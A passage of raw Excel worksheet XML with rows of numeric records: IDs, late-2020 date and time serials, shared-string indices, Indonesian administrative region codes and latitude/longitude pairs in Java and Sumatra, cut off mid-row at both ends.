      <c r="Y2453" t="str">
        <f t="shared" si="38"/>
        <v>-6.23850,106.86714</v>
      </c>
    </row>
    <row r="2454" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2454">
        <v>219700</v>
      </c>
      <c r="B2454" s="1">
        <v>44129</v>
      </c>
      <c r="C2454" s="2">
        <v>0.3354166666666667</v>
      </c>
      <c r="D2454" t="s">
        <v>2648</v>
      </c>
      <c r="E2454" t="s">
        <v>23</v>
      </c>
      <c r="G2454" t="s">
        <v>8232</v>
      </c>
      <c r="H2454" t="s">
        <v>26</v>
      </c>
      <c r="J2454" t="s">
        <v>8233</v>
      </c>
      <c r="L2454" t="s">
        <v>8234</v>
      </c>
      <c r="M2454">
        <v>3172020005</v>
      </c>
      <c r="N2454">
        <v>3172020</v>
      </c>
      <c r="O2454">
        <v>3172</v>
      </c>
      <c r="P2454">
        <v>31</v>
      </c>
      <c r="Q2454" t="s">
        <v>3744</v>
      </c>
      <c r="R2454" t="s">
        <v>1644</v>
      </c>
      <c r="S2454" t="s">
        <v>49</v>
      </c>
      <c r="T2454" t="s">
        <v>33</v>
      </c>
      <c r="U2454" s="5">
        <v>10687441</v>
      </c>
      <c r="V2454" s="5" t="s">
        <v>14652</v>
      </c>
      <c r="W2454" s="5">
        <v>-630216</v>
      </c>
      <c r="X2454" t="s">
        <v>20384</v>
      </c>
      <c r="Y2454" t="str">
        <f t="shared" si="38"/>
        <v>-6.30216,106.87441</v>
      </c>
    </row>
    <row r="2455" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2455">
        <v>219945</v>
      </c>
      <c r="B2455" s="1">
        <v>44130</v>
      </c>
      <c r="C2455" s="2">
        <v>0.23273148148148148</v>
      </c>
      <c r="D2455" t="s">
        <v>22</v>
      </c>
      <c r="E2455" t="s">
        <v>23</v>
      </c>
      <c r="F2455" t="s">
        <v>8235</v>
      </c>
      <c r="G2455" t="s">
        <v>8236</v>
      </c>
      <c r="H2455" t="s">
        <v>26</v>
      </c>
      <c r="I2455" t="s">
        <v>1090</v>
      </c>
      <c r="J2455" t="s">
        <v>2627</v>
      </c>
      <c r="L2455" t="s">
        <v>4602</v>
      </c>
      <c r="M2455">
        <v>3273260002</v>
      </c>
      <c r="N2455">
        <v>3273260</v>
      </c>
      <c r="O2455">
        <v>3273</v>
      </c>
      <c r="P2455">
        <v>32</v>
      </c>
      <c r="Q2455" t="s">
        <v>8237</v>
      </c>
      <c r="R2455" t="s">
        <v>8238</v>
      </c>
      <c r="S2455" t="s">
        <v>1464</v>
      </c>
      <c r="T2455" t="s">
        <v>42</v>
      </c>
      <c r="U2455" s="5">
        <v>10760583</v>
      </c>
      <c r="V2455" s="5" t="s">
        <v>16644</v>
      </c>
      <c r="W2455" s="5">
        <v>-686194</v>
      </c>
      <c r="X2455" t="s">
        <v>20385</v>
      </c>
      <c r="Y2455" t="str">
        <f t="shared" si="38"/>
        <v>-6.86194,107.60583</v>
      </c>
    </row>
    <row r="2456" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2456">
        <v>220009</v>
      </c>
      <c r="B2456" s="1">
        <v>44130</v>
      </c>
      <c r="C2456" s="2">
        <v>0.45128472222222221</v>
      </c>
      <c r="D2456" t="s">
        <v>22</v>
      </c>
      <c r="E2456" t="s">
        <v>23</v>
      </c>
      <c r="F2456" t="s">
        <v>8239</v>
      </c>
      <c r="G2456" t="s">
        <v>8240</v>
      </c>
      <c r="H2456" t="s">
        <v>26</v>
      </c>
      <c r="I2456" t="s">
        <v>1621</v>
      </c>
      <c r="J2456" t="s">
        <v>4142</v>
      </c>
      <c r="L2456" t="s">
        <v>8241</v>
      </c>
      <c r="M2456">
        <v>3171040004</v>
      </c>
      <c r="N2456">
        <v>3171040</v>
      </c>
      <c r="O2456">
        <v>3171</v>
      </c>
      <c r="P2456">
        <v>31</v>
      </c>
      <c r="Q2456" t="s">
        <v>4144</v>
      </c>
      <c r="R2456" t="s">
        <v>163</v>
      </c>
      <c r="S2456" t="s">
        <v>108</v>
      </c>
      <c r="T2456" t="s">
        <v>33</v>
      </c>
      <c r="U2456" s="5">
        <v>10675967</v>
      </c>
      <c r="V2456" s="5" t="s">
        <v>16581</v>
      </c>
      <c r="W2456" s="5">
        <v>-623886</v>
      </c>
      <c r="X2456" t="s">
        <v>20324</v>
      </c>
      <c r="Y2456" t="str">
        <f t="shared" si="38"/>
        <v>-6.23886,106.75967</v>
      </c>
    </row>
    <row r="2457" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2457">
        <v>220015</v>
      </c>
      <c r="B2457" s="1">
        <v>44130</v>
      </c>
      <c r="C2457" s="2">
        <v>0.46597222222222223</v>
      </c>
      <c r="D2457" t="s">
        <v>2648</v>
      </c>
      <c r="E2457" t="s">
        <v>23</v>
      </c>
      <c r="G2457" t="s">
        <v>8242</v>
      </c>
      <c r="H2457" t="s">
        <v>26</v>
      </c>
      <c r="J2457" t="s">
        <v>8233</v>
      </c>
      <c r="L2457" t="s">
        <v>8243</v>
      </c>
      <c r="M2457">
        <v>3172020005</v>
      </c>
      <c r="N2457">
        <v>3172020</v>
      </c>
      <c r="O2457">
        <v>3172</v>
      </c>
      <c r="P2457">
        <v>31</v>
      </c>
      <c r="Q2457" t="s">
        <v>3744</v>
      </c>
      <c r="R2457" t="s">
        <v>1644</v>
      </c>
      <c r="S2457" t="s">
        <v>49</v>
      </c>
      <c r="T2457" t="s">
        <v>33</v>
      </c>
      <c r="U2457" s="5">
        <v>10687446</v>
      </c>
      <c r="V2457" s="5" t="s">
        <v>16645</v>
      </c>
      <c r="W2457" s="5">
        <v>-630210</v>
      </c>
      <c r="X2457" t="s">
        <v>20386</v>
      </c>
      <c r="Y2457" t="str">
        <f t="shared" si="38"/>
        <v>-6.30210,106.87446</v>
      </c>
    </row>
    <row r="2458" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2458">
        <v>220061</v>
      </c>
      <c r="B2458" s="1">
        <v>44130</v>
      </c>
      <c r="C2458" s="2">
        <v>0.53976851851851848</v>
      </c>
      <c r="D2458" t="s">
        <v>85</v>
      </c>
      <c r="E2458" t="s">
        <v>23</v>
      </c>
      <c r="F2458" t="s">
        <v>8244</v>
      </c>
      <c r="G2458" t="s">
        <v>8245</v>
      </c>
      <c r="H2458" t="s">
        <v>26</v>
      </c>
      <c r="J2458" t="s">
        <v>2627</v>
      </c>
      <c r="K2458" t="s">
        <v>8246</v>
      </c>
      <c r="L2458" t="s">
        <v>8247</v>
      </c>
      <c r="M2458">
        <v>3275010010</v>
      </c>
      <c r="N2458">
        <v>3275010</v>
      </c>
      <c r="O2458">
        <v>3275</v>
      </c>
      <c r="P2458">
        <v>32</v>
      </c>
      <c r="Q2458" t="s">
        <v>286</v>
      </c>
      <c r="R2458" t="s">
        <v>287</v>
      </c>
      <c r="S2458" t="s">
        <v>41</v>
      </c>
      <c r="T2458" t="s">
        <v>42</v>
      </c>
      <c r="U2458" s="5">
        <v>10694411</v>
      </c>
      <c r="V2458" s="5" t="s">
        <v>16646</v>
      </c>
      <c r="W2458" s="5">
        <v>-625403</v>
      </c>
      <c r="X2458" t="s">
        <v>20387</v>
      </c>
      <c r="Y2458" t="str">
        <f t="shared" si="38"/>
        <v>-6.25403,106.94411</v>
      </c>
    </row>
    <row r="2459" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2459">
        <v>220067</v>
      </c>
      <c r="B2459" s="1">
        <v>44130</v>
      </c>
      <c r="C2459" s="2">
        <v>0.55277777777777781</v>
      </c>
      <c r="D2459" t="s">
        <v>2648</v>
      </c>
      <c r="E2459" t="s">
        <v>23</v>
      </c>
      <c r="G2459" t="s">
        <v>8248</v>
      </c>
      <c r="H2459" t="s">
        <v>26</v>
      </c>
      <c r="J2459" t="s">
        <v>4197</v>
      </c>
      <c r="L2459" t="s">
        <v>8249</v>
      </c>
      <c r="M2459">
        <v>3172020005</v>
      </c>
      <c r="N2459">
        <v>3172020</v>
      </c>
      <c r="O2459">
        <v>3172</v>
      </c>
      <c r="P2459">
        <v>31</v>
      </c>
      <c r="Q2459" t="s">
        <v>3744</v>
      </c>
      <c r="R2459" t="s">
        <v>1644</v>
      </c>
      <c r="S2459" t="s">
        <v>49</v>
      </c>
      <c r="T2459" t="s">
        <v>33</v>
      </c>
      <c r="U2459" s="5">
        <v>10687513</v>
      </c>
      <c r="V2459" s="5" t="s">
        <v>16647</v>
      </c>
      <c r="W2459" s="5">
        <v>-630269</v>
      </c>
      <c r="X2459" t="s">
        <v>20388</v>
      </c>
      <c r="Y2459" t="str">
        <f t="shared" si="38"/>
        <v>-6.30269,106.87513</v>
      </c>
    </row>
    <row r="2460" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2460">
        <v>220069</v>
      </c>
      <c r="B2460" s="1">
        <v>44130</v>
      </c>
      <c r="C2460" s="2">
        <v>0.55486111111111114</v>
      </c>
      <c r="D2460" t="s">
        <v>2648</v>
      </c>
      <c r="E2460" t="s">
        <v>23</v>
      </c>
      <c r="G2460" t="s">
        <v>8250</v>
      </c>
      <c r="H2460" t="s">
        <v>26</v>
      </c>
      <c r="J2460" t="s">
        <v>4197</v>
      </c>
      <c r="L2460" t="s">
        <v>8251</v>
      </c>
      <c r="M2460">
        <v>3172020005</v>
      </c>
      <c r="N2460">
        <v>3172020</v>
      </c>
      <c r="O2460">
        <v>3172</v>
      </c>
      <c r="P2460">
        <v>31</v>
      </c>
      <c r="Q2460" t="s">
        <v>3744</v>
      </c>
      <c r="R2460" t="s">
        <v>1644</v>
      </c>
      <c r="S2460" t="s">
        <v>49</v>
      </c>
      <c r="T2460" t="s">
        <v>33</v>
      </c>
      <c r="U2460" s="5">
        <v>10687551</v>
      </c>
      <c r="V2460" s="5" t="s">
        <v>16648</v>
      </c>
      <c r="W2460" s="5">
        <v>-630290</v>
      </c>
      <c r="X2460" t="s">
        <v>20389</v>
      </c>
      <c r="Y2460" t="str">
        <f t="shared" si="38"/>
        <v>-6.30290,106.87551</v>
      </c>
    </row>
    <row r="2461" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2461">
        <v>220292</v>
      </c>
      <c r="B2461" s="1">
        <v>44130</v>
      </c>
      <c r="C2461" s="2">
        <v>0.75050925925925915</v>
      </c>
      <c r="D2461" t="s">
        <v>22</v>
      </c>
      <c r="E2461" t="s">
        <v>23</v>
      </c>
      <c r="F2461" t="s">
        <v>8252</v>
      </c>
      <c r="G2461" t="s">
        <v>8253</v>
      </c>
      <c r="H2461" t="s">
        <v>26</v>
      </c>
      <c r="I2461" t="s">
        <v>555</v>
      </c>
      <c r="J2461" t="s">
        <v>2608</v>
      </c>
      <c r="L2461" t="s">
        <v>8254</v>
      </c>
      <c r="M2461">
        <v>3305190008</v>
      </c>
      <c r="N2461">
        <v>3305190</v>
      </c>
      <c r="O2461">
        <v>3305</v>
      </c>
      <c r="P2461">
        <v>33</v>
      </c>
      <c r="Q2461" t="s">
        <v>8255</v>
      </c>
      <c r="R2461" t="s">
        <v>8255</v>
      </c>
      <c r="S2461" t="s">
        <v>7494</v>
      </c>
      <c r="T2461" t="s">
        <v>1134</v>
      </c>
      <c r="U2461" s="5">
        <v>10952069</v>
      </c>
      <c r="V2461" s="5" t="s">
        <v>16649</v>
      </c>
      <c r="W2461" s="5">
        <v>-760743</v>
      </c>
      <c r="X2461" t="s">
        <v>20390</v>
      </c>
      <c r="Y2461" t="str">
        <f t="shared" si="38"/>
        <v>-7.60743,109.52069</v>
      </c>
    </row>
    <row r="2462" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2462">
        <v>220705</v>
      </c>
      <c r="B2462" s="1">
        <v>44131</v>
      </c>
      <c r="C2462" s="2">
        <v>0.19672453703703704</v>
      </c>
      <c r="D2462" t="s">
        <v>22</v>
      </c>
      <c r="E2462" t="s">
        <v>23</v>
      </c>
      <c r="F2462" t="s">
        <v>8256</v>
      </c>
      <c r="G2462" t="s">
        <v>8257</v>
      </c>
      <c r="H2462" t="s">
        <v>26</v>
      </c>
      <c r="I2462" t="s">
        <v>1005</v>
      </c>
      <c r="J2462" t="s">
        <v>2627</v>
      </c>
      <c r="L2462" t="s">
        <v>8258</v>
      </c>
      <c r="M2462">
        <v>3271060005</v>
      </c>
      <c r="N2462">
        <v>3271060</v>
      </c>
      <c r="O2462">
        <v>3271</v>
      </c>
      <c r="P2462">
        <v>32</v>
      </c>
      <c r="Q2462" t="s">
        <v>8259</v>
      </c>
      <c r="R2462" t="s">
        <v>7835</v>
      </c>
      <c r="S2462" t="s">
        <v>421</v>
      </c>
      <c r="T2462" t="s">
        <v>42</v>
      </c>
      <c r="U2462" s="5">
        <v>10679497</v>
      </c>
      <c r="V2462" s="5" t="s">
        <v>16650</v>
      </c>
      <c r="W2462" s="5">
        <v>-656246</v>
      </c>
      <c r="X2462" t="s">
        <v>20391</v>
      </c>
      <c r="Y2462" t="str">
        <f t="shared" si="38"/>
        <v>-6.56246,106.79497</v>
      </c>
    </row>
    <row r="2463" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2463">
        <v>220796</v>
      </c>
      <c r="B2463" s="1">
        <v>44131</v>
      </c>
      <c r="C2463" s="2">
        <v>0.30038194444444444</v>
      </c>
      <c r="D2463" t="s">
        <v>22</v>
      </c>
      <c r="E2463" t="s">
        <v>23</v>
      </c>
      <c r="F2463" t="s">
        <v>8260</v>
      </c>
      <c r="G2463" t="s">
        <v>8261</v>
      </c>
      <c r="H2463" t="s">
        <v>26</v>
      </c>
      <c r="I2463" t="s">
        <v>1633</v>
      </c>
      <c r="J2463" t="s">
        <v>2627</v>
      </c>
      <c r="L2463" t="s">
        <v>250</v>
      </c>
      <c r="M2463">
        <v>3207100012</v>
      </c>
      <c r="N2463">
        <v>3207100</v>
      </c>
      <c r="O2463">
        <v>3207</v>
      </c>
      <c r="P2463">
        <v>32</v>
      </c>
      <c r="Q2463" t="s">
        <v>8262</v>
      </c>
      <c r="R2463" t="s">
        <v>8263</v>
      </c>
      <c r="S2463" t="s">
        <v>6562</v>
      </c>
      <c r="T2463" t="s">
        <v>42</v>
      </c>
      <c r="U2463" s="5">
        <v>10862134</v>
      </c>
      <c r="V2463" s="5" t="s">
        <v>16651</v>
      </c>
      <c r="W2463" s="5">
        <v>-749247</v>
      </c>
      <c r="X2463" t="s">
        <v>20392</v>
      </c>
      <c r="Y2463" t="str">
        <f t="shared" si="38"/>
        <v>-7.49247,108.62134</v>
      </c>
    </row>
    <row r="2464" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2464">
        <v>220829</v>
      </c>
      <c r="B2464" s="1">
        <v>44131</v>
      </c>
      <c r="C2464" s="2">
        <v>0.33208333333333334</v>
      </c>
      <c r="D2464" t="s">
        <v>22</v>
      </c>
      <c r="E2464" t="s">
        <v>23</v>
      </c>
      <c r="F2464" t="s">
        <v>8264</v>
      </c>
      <c r="G2464" t="s">
        <v>8265</v>
      </c>
      <c r="H2464" t="s">
        <v>26</v>
      </c>
      <c r="I2464" t="s">
        <v>2300</v>
      </c>
      <c r="J2464" t="s">
        <v>7509</v>
      </c>
      <c r="L2464" t="s">
        <v>8266</v>
      </c>
      <c r="M2464">
        <v>1371110001</v>
      </c>
      <c r="N2464">
        <v>1371110</v>
      </c>
      <c r="O2464">
        <v>1371</v>
      </c>
      <c r="P2464">
        <v>13</v>
      </c>
      <c r="Q2464" t="s">
        <v>8267</v>
      </c>
      <c r="R2464" t="s">
        <v>7512</v>
      </c>
      <c r="S2464" t="s">
        <v>7513</v>
      </c>
      <c r="T2464" t="s">
        <v>7514</v>
      </c>
      <c r="U2464" s="5">
        <v>10036750</v>
      </c>
      <c r="V2464" s="5" t="s">
        <v>16652</v>
      </c>
      <c r="W2464" s="5">
        <v>-87643</v>
      </c>
      <c r="X2464" t="s">
        <v>20393</v>
      </c>
      <c r="Y2464" t="str">
        <f t="shared" si="38"/>
        <v>-.87643,100.36750</v>
      </c>
    </row>
    <row r="2465" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2465">
        <v>220965</v>
      </c>
      <c r="B2465" s="1">
        <v>44131</v>
      </c>
      <c r="C2465" s="2">
        <v>0.48413194444444446</v>
      </c>
      <c r="D2465" t="s">
        <v>85</v>
      </c>
      <c r="E2465" t="s">
        <v>23</v>
      </c>
      <c r="F2465" t="s">
        <v>8268</v>
      </c>
      <c r="G2465" t="s">
        <v>8269</v>
      </c>
      <c r="H2465" t="s">
        <v>26</v>
      </c>
      <c r="J2465" t="s">
        <v>2627</v>
      </c>
      <c r="K2465" t="s">
        <v>8270</v>
      </c>
      <c r="L2465" t="s">
        <v>8271</v>
      </c>
      <c r="M2465">
        <v>3211010009</v>
      </c>
      <c r="N2465">
        <v>3211010</v>
      </c>
      <c r="O2465">
        <v>3211</v>
      </c>
      <c r="P2465">
        <v>32</v>
      </c>
      <c r="Q2465" t="s">
        <v>2951</v>
      </c>
      <c r="R2465" t="s">
        <v>2952</v>
      </c>
      <c r="S2465" t="s">
        <v>1797</v>
      </c>
      <c r="T2465" t="s">
        <v>42</v>
      </c>
      <c r="U2465" s="5">
        <v>10777669</v>
      </c>
      <c r="V2465" s="5" t="s">
        <v>16653</v>
      </c>
      <c r="W2465" s="5">
        <v>-694328</v>
      </c>
      <c r="X2465" t="s">
        <v>20394</v>
      </c>
      <c r="Y2465" t="str">
        <f t="shared" si="38"/>
        <v>-6.94328,107.77669</v>
      </c>
    </row>
    <row r="2466" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2466">
        <v>221174</v>
      </c>
      <c r="B2466" s="1">
        <v>44131</v>
      </c>
      <c r="C2466" s="2">
        <v>0.73016203703703697</v>
      </c>
      <c r="D2466" t="s">
        <v>22</v>
      </c>
      <c r="E2466" t="s">
        <v>23</v>
      </c>
      <c r="F2466" t="s">
        <v>8272</v>
      </c>
      <c r="H2466" t="s">
        <v>26</v>
      </c>
      <c r="I2466" t="s">
        <v>1009</v>
      </c>
      <c r="J2466" t="s">
        <v>3135</v>
      </c>
      <c r="L2466" t="s">
        <v>8273</v>
      </c>
      <c r="M2466">
        <v>3603050002</v>
      </c>
      <c r="N2466">
        <v>3603050</v>
      </c>
      <c r="O2466">
        <v>3603</v>
      </c>
      <c r="P2466">
        <v>36</v>
      </c>
      <c r="Q2466" t="s">
        <v>8274</v>
      </c>
      <c r="R2466" t="s">
        <v>3988</v>
      </c>
      <c r="S2466" t="s">
        <v>201</v>
      </c>
      <c r="T2466" t="s">
        <v>171</v>
      </c>
      <c r="U2466" s="5">
        <v>10655818</v>
      </c>
      <c r="V2466" s="5" t="s">
        <v>16654</v>
      </c>
      <c r="W2466" s="5">
        <v>-626944</v>
      </c>
      <c r="X2466" t="s">
        <v>20395</v>
      </c>
      <c r="Y2466" t="str">
        <f t="shared" si="38"/>
        <v>-6.26944,106.55818</v>
      </c>
    </row>
    <row r="2467" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2467">
        <v>221430</v>
      </c>
      <c r="B2467" s="1">
        <v>44133</v>
      </c>
      <c r="C2467" s="2">
        <v>0.30758101851851855</v>
      </c>
      <c r="D2467" t="s">
        <v>22</v>
      </c>
      <c r="E2467" t="s">
        <v>23</v>
      </c>
      <c r="F2467" t="s">
        <v>8275</v>
      </c>
      <c r="G2467" t="s">
        <v>8276</v>
      </c>
      <c r="H2467" t="s">
        <v>26</v>
      </c>
      <c r="I2467" t="s">
        <v>2002</v>
      </c>
      <c r="J2467" t="s">
        <v>2608</v>
      </c>
      <c r="L2467" t="s">
        <v>8277</v>
      </c>
      <c r="M2467">
        <v>3301180016</v>
      </c>
      <c r="N2467">
        <v>3301180</v>
      </c>
      <c r="O2467">
        <v>3301</v>
      </c>
      <c r="P2467">
        <v>33</v>
      </c>
      <c r="Q2467" t="s">
        <v>6542</v>
      </c>
      <c r="R2467" t="s">
        <v>6543</v>
      </c>
      <c r="S2467" t="s">
        <v>2642</v>
      </c>
      <c r="T2467" t="s">
        <v>1134</v>
      </c>
      <c r="U2467" s="5">
        <v>10925509</v>
      </c>
      <c r="V2467" s="5" t="s">
        <v>16655</v>
      </c>
      <c r="W2467" s="5">
        <v>-760011</v>
      </c>
      <c r="X2467" t="s">
        <v>20396</v>
      </c>
      <c r="Y2467" t="str">
        <f t="shared" si="38"/>
        <v>-7.60011,109.25509</v>
      </c>
    </row>
    <row r="2468" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2468">
        <v>221466</v>
      </c>
      <c r="B2468" s="1">
        <v>44136</v>
      </c>
      <c r="C2468" s="2">
        <v>0.6177083333333333</v>
      </c>
      <c r="D2468" t="s">
        <v>22</v>
      </c>
      <c r="E2468" t="s">
        <v>23</v>
      </c>
      <c r="F2468" t="s">
        <v>8278</v>
      </c>
      <c r="H2468" t="s">
        <v>7086</v>
      </c>
      <c r="I2468" t="s">
        <v>7414</v>
      </c>
      <c r="J2468" t="s">
        <v>2627</v>
      </c>
      <c r="L2468" t="s">
        <v>8279</v>
      </c>
      <c r="M2468">
        <v>3204140003</v>
      </c>
      <c r="N2468">
        <v>3204140</v>
      </c>
      <c r="O2468">
        <v>3204</v>
      </c>
      <c r="P2468">
        <v>32</v>
      </c>
      <c r="Q2468" t="s">
        <v>1732</v>
      </c>
      <c r="R2468" t="s">
        <v>1732</v>
      </c>
      <c r="S2468" t="s">
        <v>1464</v>
      </c>
      <c r="T2468" t="s">
        <v>42</v>
      </c>
      <c r="U2468" s="5">
        <v>10762369</v>
      </c>
      <c r="V2468" s="5" t="s">
        <v>16656</v>
      </c>
      <c r="W2468" s="5">
        <v>-701098</v>
      </c>
      <c r="X2468" t="s">
        <v>20397</v>
      </c>
      <c r="Y2468" t="str">
        <f t="shared" si="38"/>
        <v>-7.01098,107.62369</v>
      </c>
    </row>
    <row r="2469" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2469">
        <v>221467</v>
      </c>
      <c r="B2469" s="1">
        <v>44136</v>
      </c>
      <c r="C2469" s="2">
        <v>0.70556712962962964</v>
      </c>
      <c r="D2469" t="s">
        <v>22</v>
      </c>
      <c r="E2469" t="s">
        <v>23</v>
      </c>
      <c r="F2469" t="s">
        <v>8280</v>
      </c>
      <c r="H2469" t="s">
        <v>7086</v>
      </c>
      <c r="I2469" t="s">
        <v>8281</v>
      </c>
      <c r="J2469" t="s">
        <v>2622</v>
      </c>
      <c r="L2469" t="s">
        <v>1171</v>
      </c>
      <c r="M2469">
        <v>3514130012</v>
      </c>
      <c r="N2469">
        <v>3514130</v>
      </c>
      <c r="O2469">
        <v>3514</v>
      </c>
      <c r="P2469">
        <v>35</v>
      </c>
      <c r="Q2469" t="s">
        <v>8282</v>
      </c>
      <c r="R2469" t="s">
        <v>8283</v>
      </c>
      <c r="S2469" t="s">
        <v>8284</v>
      </c>
      <c r="T2469" t="s">
        <v>1221</v>
      </c>
      <c r="U2469" s="5">
        <v>11270068</v>
      </c>
      <c r="V2469" s="5" t="s">
        <v>16657</v>
      </c>
      <c r="W2469" s="5">
        <v>-755530</v>
      </c>
      <c r="X2469" t="s">
        <v>20398</v>
      </c>
      <c r="Y2469" t="str">
        <f t="shared" si="38"/>
        <v>-7.55530,112.70068</v>
      </c>
    </row>
    <row r="2470" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2470">
        <v>221468</v>
      </c>
      <c r="B2470" s="1">
        <v>44137</v>
      </c>
      <c r="C2470" s="2">
        <v>8.7777777777777774E-2</v>
      </c>
      <c r="D2470" t="s">
        <v>22</v>
      </c>
      <c r="E2470" t="s">
        <v>23</v>
      </c>
      <c r="F2470" t="s">
        <v>8285</v>
      </c>
      <c r="G2470" t="s">
        <v>8286</v>
      </c>
      <c r="H2470" t="s">
        <v>26</v>
      </c>
      <c r="I2470" t="s">
        <v>137</v>
      </c>
      <c r="J2470" t="s">
        <v>2627</v>
      </c>
      <c r="L2470" t="s">
        <v>8287</v>
      </c>
      <c r="M2470">
        <v>3216062001</v>
      </c>
      <c r="N2470">
        <v>3216062</v>
      </c>
      <c r="O2470">
        <v>3216</v>
      </c>
      <c r="P2470">
        <v>32</v>
      </c>
      <c r="Q2470" t="s">
        <v>8288</v>
      </c>
      <c r="R2470" t="s">
        <v>8289</v>
      </c>
      <c r="S2470" t="s">
        <v>41</v>
      </c>
      <c r="T2470" t="s">
        <v>42</v>
      </c>
      <c r="U2470" s="5">
        <v>10717540</v>
      </c>
      <c r="V2470" s="5" t="s">
        <v>16658</v>
      </c>
      <c r="W2470" s="5">
        <v>-624796</v>
      </c>
      <c r="X2470" t="s">
        <v>20399</v>
      </c>
      <c r="Y2470" t="str">
        <f t="shared" si="38"/>
        <v>-6.24796,107.17540</v>
      </c>
    </row>
    <row r="2471" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2471">
        <v>221471</v>
      </c>
      <c r="B2471" s="1">
        <v>44138</v>
      </c>
      <c r="C2471" s="2">
        <v>0.17377314814814815</v>
      </c>
      <c r="D2471" t="s">
        <v>22</v>
      </c>
      <c r="E2471" t="s">
        <v>23</v>
      </c>
      <c r="F2471" t="s">
        <v>8290</v>
      </c>
      <c r="G2471" t="s">
        <v>8291</v>
      </c>
      <c r="H2471" t="s">
        <v>26</v>
      </c>
      <c r="I2471" t="s">
        <v>386</v>
      </c>
      <c r="J2471" t="s">
        <v>8292</v>
      </c>
      <c r="L2471" t="s">
        <v>250</v>
      </c>
      <c r="M2471">
        <v>3174010002</v>
      </c>
      <c r="N2471">
        <v>3174010</v>
      </c>
      <c r="O2471">
        <v>3174</v>
      </c>
      <c r="P2471">
        <v>31</v>
      </c>
      <c r="Q2471" t="s">
        <v>514</v>
      </c>
      <c r="R2471" t="s">
        <v>69</v>
      </c>
      <c r="S2471" t="s">
        <v>32</v>
      </c>
      <c r="T2471" t="s">
        <v>33</v>
      </c>
      <c r="U2471" s="5">
        <v>10676031</v>
      </c>
      <c r="V2471" s="5" t="s">
        <v>14636</v>
      </c>
      <c r="W2471" s="5">
        <v>-619952</v>
      </c>
      <c r="X2471" t="s">
        <v>19108</v>
      </c>
      <c r="Y2471" t="str">
        <f t="shared" si="38"/>
        <v>-6.19952,106.76031</v>
      </c>
    </row>
    <row r="2472" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2472">
        <v>221491</v>
      </c>
      <c r="B2472" s="1">
        <v>44138</v>
      </c>
      <c r="C2472" s="2">
        <v>0.18997685185185187</v>
      </c>
      <c r="D2472" t="s">
        <v>22</v>
      </c>
      <c r="E2472" t="s">
        <v>23</v>
      </c>
      <c r="F2472" t="s">
        <v>8293</v>
      </c>
      <c r="H2472" t="s">
        <v>26</v>
      </c>
      <c r="I2472" t="s">
        <v>197</v>
      </c>
      <c r="J2472" t="s">
        <v>2622</v>
      </c>
      <c r="L2472" t="s">
        <v>8294</v>
      </c>
      <c r="M2472">
        <v>3514130015</v>
      </c>
      <c r="N2472">
        <v>3514130</v>
      </c>
      <c r="O2472">
        <v>3514</v>
      </c>
      <c r="P2472">
        <v>35</v>
      </c>
      <c r="Q2472" t="s">
        <v>8283</v>
      </c>
      <c r="R2472" t="s">
        <v>8283</v>
      </c>
      <c r="S2472" t="s">
        <v>8284</v>
      </c>
      <c r="T2472" t="s">
        <v>1221</v>
      </c>
      <c r="U2472" s="5">
        <v>11270054</v>
      </c>
      <c r="V2472" s="5" t="s">
        <v>16659</v>
      </c>
      <c r="W2472" s="5">
        <v>-755041</v>
      </c>
      <c r="X2472" t="s">
        <v>20400</v>
      </c>
      <c r="Y2472" t="str">
        <f t="shared" si="38"/>
        <v>-7.55041,112.70054</v>
      </c>
    </row>
    <row r="2473" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2473">
        <v>221495</v>
      </c>
      <c r="B2473" s="1">
        <v>44139</v>
      </c>
      <c r="C2473" s="2">
        <v>0.20861111111111111</v>
      </c>
      <c r="D2473" t="s">
        <v>22</v>
      </c>
      <c r="E2473" t="s">
        <v>23</v>
      </c>
      <c r="F2473" t="s">
        <v>8295</v>
      </c>
      <c r="H2473" t="s">
        <v>26</v>
      </c>
      <c r="I2473" t="s">
        <v>1538</v>
      </c>
      <c r="J2473" t="s">
        <v>2608</v>
      </c>
      <c r="L2473" t="s">
        <v>8296</v>
      </c>
      <c r="M2473">
        <v>3301020003</v>
      </c>
      <c r="N2473">
        <v>3301020</v>
      </c>
      <c r="O2473">
        <v>3301</v>
      </c>
      <c r="P2473">
        <v>33</v>
      </c>
      <c r="Q2473" t="s">
        <v>8297</v>
      </c>
      <c r="R2473" t="s">
        <v>8298</v>
      </c>
      <c r="S2473" t="s">
        <v>2642</v>
      </c>
      <c r="T2473" t="s">
        <v>1134</v>
      </c>
      <c r="U2473" s="5">
        <v>10869280</v>
      </c>
      <c r="V2473" s="5" t="s">
        <v>16660</v>
      </c>
      <c r="W2473" s="5">
        <v>-739487</v>
      </c>
      <c r="X2473" t="s">
        <v>20401</v>
      </c>
      <c r="Y2473" t="str">
        <f t="shared" si="38"/>
        <v>-7.39487,108.69280</v>
      </c>
    </row>
    <row r="2474" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2474">
        <v>221509</v>
      </c>
      <c r="B2474" s="1">
        <v>44141</v>
      </c>
      <c r="C2474" s="2">
        <v>0.41319444444444442</v>
      </c>
      <c r="D2474" t="s">
        <v>2648</v>
      </c>
      <c r="E2474" t="s">
        <v>23</v>
      </c>
      <c r="G2474" t="s">
        <v>8299</v>
      </c>
      <c r="H2474" t="s">
        <v>26</v>
      </c>
      <c r="J2474" t="s">
        <v>8300</v>
      </c>
      <c r="L2474" t="s">
        <v>8301</v>
      </c>
      <c r="M2474">
        <v>3174020005</v>
      </c>
      <c r="N2474">
        <v>3174020</v>
      </c>
      <c r="O2474">
        <v>3174</v>
      </c>
      <c r="P2474">
